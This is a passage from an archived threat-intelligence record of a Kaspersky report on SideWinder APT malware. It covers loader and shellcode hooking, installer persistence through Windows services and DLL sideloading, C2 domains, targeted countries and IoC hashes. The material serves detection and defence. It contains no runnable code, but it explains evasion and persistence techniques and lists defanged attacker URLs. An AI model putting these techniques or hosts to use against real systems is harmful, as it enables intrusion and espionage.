observed during the investigation, we can infer that each “name” value probably also indicates the real purpose of the file.\r\nVariable | Description\r\n?name=inpl64 | implant for 64-bit architectures\r\n?name=stg64 | stager for 64-bit architectures\r\n?name=rlfr | reflective loader ???\r\nThe downloaded data are combined into a final payload with the following structure:\r\nstg64 + \u003csize of rlfr+inpl64+8\u003e + rlfr + \u003cdelimiter\u003e + inpl64\r\nFinally, the malware loads the payload into memory and executes it. The execution method is selected according to the version of Windows.\r\nOn systems prior to Windows 10, the malware allocates a memory region with read, write and execute permissions, copies the previously generated payload to the new region, and directly calls the first address.\r\nOn newer systems, the malware allocates a larger memory space and prepends a small shellcode located in the “.data” section to the final payload.\r\nThe malware then patches the kernel32 image in memory and hooks the “LoadLibraryA” function to redirect the execution flow to the small shellcode copied into the allocated region.\r\nFinally, it calls the “LoadLibraryA” function, passing the argument “aepic.dll”.\r\nSnippet of reversed code used to hook LoadLibrary and run the payload\r\nThe small shellcode compares the first 8 bytes of the received argument with the static string “aepic.dl”, and if the bytes match, it jumps to the downloaded shellcode “stg64”; otherwise, it jumps to the real “LoadLibraryA” function.\r\nShellcode embedded in the downloader image\r\nInstallers\r\nDuring the investigation we found two more components, which are installers used to deploy StealerBot on the systems. We didn’t observe them during the infection chain. They are probably used to install new versions of the malware or deploy the malware in different contexts on the same machine. 
For example, to infect another user.\r\nInstallerPayload\r\nThe first component is a library developed in C++ that acts as a loader. The code is very similar to the “Downloader” component observed in the UAC bypass module. The library contains different payloads that are joined together at runtime and injected into the remote “spoolsv.exe” process.\r\nThe injected payload reflectively loads a library called “InstallerPayload.dll”, written in C++, to download additional components and maintain their persistence by creating a new Windows service.\r\nThe malware is configured to download the files from a predefined URL using WinHTTP.\r\nhxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869EF0mo673/1/1706084656128/x3l8o/2c821e\r\nThe specific file to be downloaded is requested with a variable “name”, which is included in all GET requests. Each file is downloaded to a specific location:\r\nVariable | Destination file path\r\n?name=bp | %systemroot%\\srclinks\\%RANDOM_NAME% (example name: VacPWtys)\r\n?name=ps | %systemroot%\\srclinks\\write.exe or %systemroot%\\srclinks\\fsquirt.exe\r\n?name=dj | %systemroot%\\srclinks\\devobj.dll or %systemroot%\\srclinks\\propsys.dll\r\n?name=v3d | %systemroot%\\srclinks\\vm3dservice.exe\r\n?name=svh | %systemroot%\\srclinks\\winmm.dll\r\n?name=fsq | %systemroot%\\srclinks\\write.exe or %systemroot%\\srclinks\\fsquirt.exe\r\nThe specific filename changes according to the Windows version.\r\nIf the Windows build is lower than 10240 (Windows 10 build 10240), the malware installs the following 
files:\r\n%systemroot%\\srclinks\\write.exe\r\n%systemroot%\\srclinks\\propsys.dll\r\n%systemroot%\\srclinks\\write.exe.config\r\n%systemroot%\\srclinks\\vm3dservice.exe\r\n%systemroot%\\srclinks\\winmm.dll\r\nOtherwise:\r\n%systemroot%\\srclinks\\fsquirt.exe\r\n%systemroot%\\srclinks\\devobj.dll\r\n%systemroot%\\srclinks\\fsquirt.exe.config\r\n%systemroot%\\srclinks\\vm3dservice.exe\r\n%systemroot%\\srclinks\\winmm.dll\r\nThe malware also creates a new Windows service named \"srclink\" to ensure that the downloaded files start automatically when the system restarts.\r\nThe service is configured to start automatically and run the following program:\r\nC:\\WINDOWS\\srclinks\\vm3dservice.exe\r\nThe file is a legitimate program digitally signed by VMware and is used by the attacker to sideload the malicious \"winmm.dll\" library.\r\nThis is a library developed in C++ and named \"SyncBotServiceHijack.dll\" that exports all the functions normally exported by the legitimate “winmm.dll” library located in the system32 directory.\r\nAll the functions point to a function that sleeps for 10 seconds and then raises a signal error and terminates execution.\r\nInstructions used to raise an error\r\nThis is part of the persistence mechanism created by the attacker. The malicious Windows service created by the InstallerPayload component is configured to launch another program if the service fails.\r\nWindows service properties\r\nWe may presume that the attacker uses this trick to bypass detection and sandbox technologies.\r\nIn this case, the service starts another program previously dropped by the malware:\r\n%systemroot%\\srclinks\\fsquirt.exe\r\nThis is a legitimate Windows utility that provides the default GUI used by the Bluetooth File Transfer Wizard. 
This utility is used by the attacker to sideload another malicious library, \"devobj.dll\", which is a variant of the Backdoor loader module.\r\nInstallerPayload_NET\r\nThis is another .NET library, which performs similar actions to the previously described InstallerPayload developed in C++. The main difference is that this malware embeds most of the files as resources.\r\nResource | Hash | Description\r\ndevobjLoadAppDllx32 | a7aad43a572f44f8c008b9885cf936cf | “Backdoor loader module” dropped as devobj.dll\r\nfsquirt | ba54013cad72cd79d2b7843602835ed3 | Legitimate program signed by Microsoft\r\nManage | f840c721e533c05d152d2bc7bf1bc165 | Program to hijack Windows service\r\nmanifest | d3136d7151f60ec41a370f4743c2983b | XML manifest\r\npropsysLoadAppDllx32 | 56e7d6b5c61306096a5ba22ebbfb454e | “Backdoor loader module” dropped as propsys.dll\r\nSimilar to InstallerPayload, the malware creates a new service that launches Manage.exe. Manage.exe is a simple program that sleeps for 20 seconds and then generates an exception.\r\nThe service is configured to launch another program in case of failure. The second program, \"fsquirt.exe\" or \"write.exe\", is a legitimate application that is used to sideload a malicious library, the Backdoor loader module component.\r\nThe encrypted file to be loaded by the Backdoor loader module component is downloaded from a remote server using a URL embedded in the code:\r\nhxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572\r\nThe received data are stored in a file with a random name and no extension.\r\nInfrastructure\r\nThe attacker registered numerous domains using Hostinger, Namecheap, and Hosting Concepts as providers. They typically configure the malware to communicate with FQDNs using specific subdomains with names that appear legitimate and are probably selected for relevance to the target. 
For example, the following is a small subset of subdomains used by the attacker.\r\nnextgen[.]paknavy-govpk[.]net\r\npremier[.]moittpk[.]org\r\ncabinet-division-pk[.]fia-gov[.]com\r\nnavy-lk[.]direct888[.]net\r\nsrilanka-navy[.]lforvk[.]com\r\nportdjibouti[.]pmd-office[.]org\r\nportdedjibouti[.]shipping-policy[.]info\r\nmofa-gov-sa[.]direct888[.]net\r\nmod-gov-bd[.]direct888[.]net\r\nmmcert-org-mm[.]donwloaded[.]com\r\nopmcm-gov-np[.]fia-gov[.]net\r\nEach domain and its related subdomains are resolved with a dedicated IP address. The C2s are hosted on a VPS used exclusively by the attacker, but rented from different providers for a very short time. The attacker uses different service providers, but has a preference for HZ Hosting, BlueVPS, and GhostNET.\r\nVictims\r\nSideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.\r\nTargeted sectors include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities and oil trading companies. The attacker also targeted diplomatic entities in the following countries: Afghanistan, France, China, India, Indonesia and Morocco.\r\nAttribution\r\nWe attribute these activities to the SideWinder APT group with medium/high confidence. The infection chain observed in these attacks is consistent with those observed in the past. 
Specifically, the following techniques are similar to previous SideWinder activity:\r\nThe use of remote template injection, which is abused to download RTF files named “file.rtf” and forged to exploit CVE-2017-11882.\r\nThe naming scheme used for the malicious subdomains, which attempts to resemble legitimate domains that are of significance to the targets.\r\nThe .NET Downloader component and the Backdoor loader module are similar to those described in the past.\r\nLast but not least, most of the entities targeted by the group are similar to those targeted by SideWinder in the past.\r\n***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.\r\nIOCs\r\nMalicious documents\r\n6cf6d55a3968e2176db2bba2134bbe94\r\nc87eb71ff038df7b517644fa5c097eac\r\n8202209354ece5c53648c52bdbd064f0\r\n5cc784afb69c153ab325266e8a7afaf4\r\n3a6916192106ae3ac7e55bd357bc5eee\r\n54aadadcf77dec53b2566fe61b034384\r\n8f83d19c2efc062e8983bce83062c9b6\r\n8e8b61e5fb6f6792f2bee0ec947f1989\r\n86eeb037f5669bff655de1e08199a554\r\n1c36177ac4423129e301c5a40247f180\r\n873079cd3e635adb609c38af71bad702\r\n423e150d91edc568546f0d2f064a8bf1\r\n4a5e818178f9b2dc48839a5dbe0e3cc1\r\nRtf\r\n26aa30505d8358ebeb5ee15aecb1cbb0\r\n3233db78e37302b47436b550a21cdaf9\r\n8d7c43913eba26f96cd656966c1e26d5\r\nd0d1fba6bb7be933889ace0d6955a1d7\r\ne706fc65f433e54538a3dbb1c359d75f\r\nLnk\r\n412b6ac53aeadb08449e41dccffb1abe | දිනදි සං ශෝ ධන කර ගැ නිම .lnk\r\n2f4ba98dcd45e59fca488f436ab13501 | Special Envoy Speech at NCA.jpg .lnk\r\nBackdoor Loader\r\npropsys.dll\r\nb69867ee5b9581687cef96e873b775ff\r\nc3ce4094b3411060928143f63701aa2e\r\ne1bdfa55227d37a71cdc248dc9512296\r\nea4b3f023bac3ad1a982cace9a6eafc3\r\n44dbdd87b60c20b22d2a7926ad2d7bea\r\n7e97cbf25eef7fc79828c033049822af\r\nvsstrace.dll\r\n101a63ecdd8c68434c665bf2b1d3ffc7\r\nd885df399fc9f6c80e2df0c290414c2f\r\n92dd91a5e3dfb6260e13c8033b729e03\r\n515d2d6f91ba4b76847301855dfc0e83\r\n3ede84d84c02aa7483eb734776a20dea\r\n2011658436a7b04935c06f59a5db7161\r\nStealerBot\r\n3a036a1846bfeceb615101b10c7c910e | Orchestrator\r\n47f51c7f31ab4a0d91a0f4c07b2f99d7 | Keylogger\r\nf3058ac120a2ae7807f36899e27784ea | Screenshot grabber\r\n0fbb71525d65f0196a9bfbffea285b18 | File stealer\r\n1ed7ad166567c46f71dc703e55d31c7a | Live Console\r\n2f0e150e3d6dbb1624c727d1a641e754 | RDP Credential Stealer\r\nbf16760ee49742225fdb2a73c1bd83c7 | RDP Credential Stealer – Injected library mscorlib.dll\r\nb3650a88a50108873fc45ad3c249671a | Token Grabber\r\n4c40fcb2a12f171533fc070464db96d1 | Credential Phisher – Injected library\r\neef9c0a9e364b4516a83a92592ffc831 | UACBypass\r\n1be93704870afd0b22a4475014f199c3 | Service Hijack – SyncBotServiceHijack.dll\r\nf840c721e533c05d152d2bc7bf1bc165 | Manage.exe\r\n5718c0d69939284ce4f6e0ce580958df | Backdoor Loader devobj.dll\r\nDomains and IPs\r\n126-com[.]live\r\n163inc[.]com\r\nafmat[.]tech\r\nalit[.]live\r\naliyum[.]tech\r\naliyumm[.]tech\r\nasyn[.]info\r\nausibedu[.]org\r\nbol-south[.]org\r\ncnsa-gov[.]org\r\ncolot[.]info\r\ncomptes[.]tech\r\ncondet[.]org\r\nconft[.]live\r\ndafpak[.]org\r\ndecoty[.]tech\r\ndefenec[.]net\r\ndefpak[.]org\r\ndetru[.]info\r\ndgps-govpk[.]co\r\ndgps-govpk[.]com\r\ndinfed[.]co\r\ndirctt88[.]co\r\ndirctt88[.]net\r\ndirect888[.]net\r\ndirect88[.]co\r\ndirectt888[.]com\r\ndonwload-file[.]com\r\ndonwloaded[.]com\r\ndonwloaded[.]net\r\ndowmload[.]net\r\ndownld[.]net\r\ndownload-file[.]net\r\ndownloadabledocx[.]com\r\ndynat[.]tech\r\ndytt88[.]org\r\ne1ix[.]mov\r\ne1x[.]tech\r\nfia-gov[.]com\r\nfia-gov[.]net\r\ngov-govpk[.]info\r\ngovpk[.]info\r\ngovpk[.]net\r\ngrouit[.]tech\r\ngtrec[.]info\r\nhealththebest[.]com\r\njmicc[.]xyz\r\nkernet[.]info\r\nkretic[.]info\r\nlforvk[.]com\r\nmfa-gov[.]info\r\nmfa-gov[.]net\r\nmfa-govt[.]net\r\nmfacom[.]org\r\nmfagov[.]org\r\nmfas[.]pro\r\nmitlec[.]site\r\nmod-gov-pk[.]live\r\nmofa[.]email\r\nmofagovs[.]org\r\nmoittpk[.]net\r\nmoittpk[.]org\r\nmshealthcheck[.]live\r\nnactagovpk[.]org\r\nnavy-mil[.]co\r\nnewmofa[.]com\r\nnewoutlook[.]live\r\nnopler[.]live\r\nntcpak[.]live\r\nntcpak[.]org\r\nntcpk[.]info\r\nntcpk[.]net\r\nnumpy[.]info\r\nnumzy[.]net\r\nnventic[.]info\r\noffice-drive[.]live\r\npafgovt[.]com\r\npaknavy-gov[.]org\r\npaknavy-govpk[.]info\r\npaknavy-govpk[.]net\r\npdfrdr-update[.]com\r\npdfrdr-update[.]info\r\npmd-office[.]com\r\npmd-office[.]live\r\npmd-office[.]org\r\nptcl-net[.]com\r\nscrabt[.]tech\r\nshipping-policy[.]info\r\nsjfu-edu[.]co\r\nsupport-update[.]info\r\ntazze[.]co\r\ntex-ideas[.]info\r\ntni-mil[.]com\r\ntsinghua-edu[.]tech\r\ntumet[.]info\r\nu1x[.]co\r\nujsen[.]net\r\nupdate-govpk[.]co\r\nupdtesession[.]online\r\nwidge[.]info\r\nSource: https://securelist.com/sidewinder-apt/114089/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://securelist.com/sidewinder-apt/114089/"
	],
	"report_names": [
		"114089"
	],
	"threat_actors": [
		{
			"id": "3cc6c262-df23-4075-a93f-b496e8908eb2",
			"created_at": "2022-10-25T16:07:23.682239Z",
			"updated_at": "2026-04-10T02:00:04.708878Z",
			"deleted_at": null,
			"main_name": "GhostNet",
			"aliases": [
				"GhostNet",
				"Snooping Dragon"
			],
			"source_name": "ETDA:GhostNet",
			"tools": [
				"AngryRebel",
				"Farfli",
				"Gh0st RAT",
				"Gh0stnet",
				"Ghost RAT",
				"Ghostnet",
				"Moudour",
				"Mydoor",
				"PCRat",
				"Remosh",
				"TOM-Skype"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e91dae30-a513-4fb1-aace-4457466313b3",
			"created_at": "2023-01-06T13:46:38.974913Z",
			"updated_at": "2026-04-10T02:00:03.168521Z",
			"deleted_at": null,
			"main_name": "GhostNet",
			"aliases": [
				"Snooping Dragon"
			],
			"source_name": "MISPGALAXY:GhostNet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e",
			"created_at": "2023-01-06T13:46:39.080551Z",
			"updated_at": "2026-04-10T02:00:03.206572Z",
			"deleted_at": null,
			"main_name": "RAZOR TIGER",
			"aliases": [
				"APT-C-17",
				"T-APT-04",
				"SideWinder"
			],
			"source_name": "MISPGALAXY:RAZOR TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b9fc913-06c6-4432-8c58-86a3ac614564",
			"created_at": "2022-10-25T16:07:24.185236Z",
			"updated_at": "2026-04-10T02:00:04.893541Z",
			"deleted_at": null,
			"main_name": "SideWinder",
			"aliases": [
				"APT-C-17",
				"APT-Q-39",
				"BabyElephant",
				"G0121",
				"GroupA21",
				"HN2",
				"Hardcore Nationalist",
				"Rattlesnake",
				"Razor Tiger",
				"SideWinder",
				"T-APT-04"
			],
			"source_name": "ETDA:SideWinder",
			"tools": [
				"BroStealer",
				"Capriccio RAT",
				"callCam"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "173f1641-36e3-4bce-9834-c5372468b4f7",
			"created_at": "2022-10-25T15:50:23.349637Z",
			"updated_at": "2026-04-10T02:00:05.3486Z",
			"deleted_at": null,
			"main_name": "Sidewinder",
			"aliases": [
				"Sidewinder",
				"T-APT-04"
			],
			"source_name": "MITRE:Sidewinder",
			"tools": [
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434942,
	"ts_updated_at": 1775792240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cd734a8f8f6349cf28a379073393fcb8747f4b22.pdf",
		"text": "https://archive.orkl.eu/cd734a8f8f6349cf28a379073393fcb8747f4b22.txt",
		"img": "https://archive.orkl.eu/cd734a8f8f6349cf28a379073393fcb8747f4b22.jpg"
	}
}